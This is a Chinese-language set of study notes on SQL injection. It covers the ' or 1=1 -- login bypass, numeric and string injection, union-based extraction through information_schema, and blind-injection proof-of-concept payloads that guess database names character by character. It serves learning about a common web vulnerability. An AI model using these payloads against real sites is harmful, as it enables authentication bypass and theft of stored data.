SQL 注入漏洞浅研究学习
SQL注入漏洞:Web安全方面最高危的漏洞,SQL漏洞威胁着网站后台数据的安全问题。
网上常说“万能密码”,这个万能密码则就是利用了SQL注入漏洞;
' or 1=1 --
上述的万能密码输入在用户登录框中 ,如果把他和SQL语句拼接,就可以发现奥秘:
String sql = "Select count(*) from admin where username = ' 'or 1=1 -- ' and password = '********'
上述SQL语句则是我们输入万能密码后,服务器后台拼接的SQL语句;仔细观察语句,发现 ‘ or 1=1 -- 的作用就是将前面的语句闭合为空,然后or判断1=1,最用 -- 将其后的语句注释掉。由此 ‘or 1=1 -- 就可以完全的绕过SQL中的查询验证。
SQL漏洞的分类:
1、数字型注入漏洞:
当输入的参数为整型时,则可以认为是数字型注入;(需要注意的是,数字型注入不需要单引号闭合哦)设定如下SQL语句环境:
select * from table where id=8 ;
id=8是测试的输入;如果报错则不是整型输入,若不报错则认为是整型输入;
select * from table where id=8 and 1=1
select * from table where id=8 and 1=2
如上,第一条SQL输入若返回结果和原结果无差别,第二条返回的结果可以执行但没有结果,——则可以认为该处存在数字型注入点;
2、字符型注入漏洞:
当输入的参数为字符串时,(字符型输入需要单引号闭合哦)
字符型和数字型例句比较:
数字型: select * from table where id=8 ; 字符型: select * from table where username='admin'
字符型注入最重要的就是要闭合SQL语句和注释掉多余的SQL语句;原因解释:
在SQL语句中,字符串会被单引号给转义化,在SQL拼接我们的输入的数据的时候,
会用单引号将我们的输入内容给单引号转义化,整个输入内容都会被认为是需要查询的内容串,
由此我们需要用单引号闭合SQL拼接的单引号,而后在 -- 注释掉后面的内容(单引号)让我们的注入语句可以不被SQL拼接而导致转义化。
select * from username = ' ** '
上述为还未拼接的SQL语句,在查询处首先用单引号包含,目的就是将用户输入的内容以字符的内容形式查询;
select * from username = ' ' or 1=1 -- ' '
上例SQL语句则是拼接后的语句,可以观察出,’ 与之前的单引号成对,将两个单引号之间的内容闭合了,其后 or 1=1 则可以形成一个单独的非字符串的SQL功能语句, -- 注释语句可以将后面更多的碍事的SQL语句给注释掉。
## 字符型SQL注入,必须闭合单引号并注释多余的SQL语句。
——————————
https://mp.weixin.qq.com/s/vIHbtpi6eiv4ZoZ9ztyjsA
常见的mysql数据库注入姿势:(引用上方链接内容)
功能 | 查询语句
查库 | select schema_name from information_schema.schemata | 查当前数据库中所有库名
查表 | select table_name from information_schema.tables where table_schema = ‘库名’ | 查库中的所有表名
查列 | select column_name from information_schema.columns where table_name = ‘表名’ | 查表中的所有列名
查数据 | select 列名 from 库名.表名 |
mySQL内置库—— information_schema:
其中保存有MYSQL所维护的所有数据库信息,包括库名、表名、表列、权限……等信息
Mysql内置库—— performance_schema:
用于收集数据库服务器的性能参数
mysql内置库——mysql:
保留mysql的账户信息、权限、存储过程、event、时区等配置信息
mysql内置库——sys:
百度哦~~~~
数据库的注入一般分步骤的:
第一步:判断注入点
我们需要判断数字型还是字符型注入类型,主要依靠or或and条件语句是否被处理(单引号闭合和语句注释非常重要)
第二部:猜解字段数
我们需要猜出我们查询语句中的字段数;
1 ' order by 1 -- //正常 1 ' order by 2 -- //正常 1 ' order by 3 -- //报错
根据上例的SQL语句可以得出,我们查询语句中只有2个字段;
第三步:确定显示的字段
利用 union 联合查询(回显注入) ;
第四步:获取当前数据库的库名
1 ' union select 1,database() --
第五步:获取数据库中的表
** ' union select 1,table_name from information_schema.tables where table_schema = '库名'
第六步:获取字段名
** ' union select 1,column_name from information_schema.columns where table_name = '表名'
第七步:查询需求数据
——————————————————————
SQL盲注:
1、判断注入点
2、猜解当前库名
盲注不可以利用回显注入的方式直接获得数据,但是我们可以一一猜解,猜解条件就是利用前面的真假条件:
1 ' and true # 结果为真 1 ' and false # 结果为假
3、获得库名长度
盲注中获取字符串长度 length(str);由此猜解数据库名的长度。
输入 1 ' and length(database())>1 -- [结果为真表示长度大于1] 输入 1 ' and length(database())>10 -- [结果为假表示长度小于10]
left(str,n) 【从左侧开始截取字符串str的前n位】
substr(expression,start,length)
获取字符串 (原始字符串 字符串开始的位置 字串长度)
ASCII(a) 【将某个字符转换为ASCII值】
mid() 函数 与 substr函数功能类似
ord()函数 与 ASCII函数功能类似
regexp {(select user())regexp '^r} 正则用法
常用 POC and left(select(database()),1) = 'a' -- + and (select database()) regexp '^r' and (select database()) like 'r%' and ord(mid((select database())1,1))>97 and ascii(substr((select database()),1,1))>97 [常用]
输入:
1'and ascii(substr((select database()),1,1))>97
正常返回,则表示数据库的第一个字符的ascii值大于97 ;#依次采用逐步猜解的方法就可以逐步的推断出库名了。
4、猜解库中的表数量
and (select count(table_name) from information_schema.tables where table_schema=库名) = 数量
当上条SQL语句显示存在时,则当前的数量就是库中表的数量。
5、猜解表名
第一步:猜解出表名的长度
and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=长度量 【猜解表名长度】
按照上面的SQL猜解出表名的长度。
第二步:猜解表名
and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))>ascii数
按照上述的SQL推倒,可以逐步推演出表名。
6、猜解字段名
and (select count(column_name) from information_schema.columns where table_name = 表名) = 字段的数量
and length(select column_name from information_schema.columns where table_name = 表名 limit 0,1)=字段名长度
双注入查询需要理解四个函数/语句 1. Rand() //随机函数 返回0-1之间的随机数 2. Floor() //取整函数 3. Count() //汇总函数 4. Group by //分组语句
SQL注入衔接学习:https://mp.weixin.qq.com/s/NKO5RbYUerhxlZtmPjxDSQ
……………………
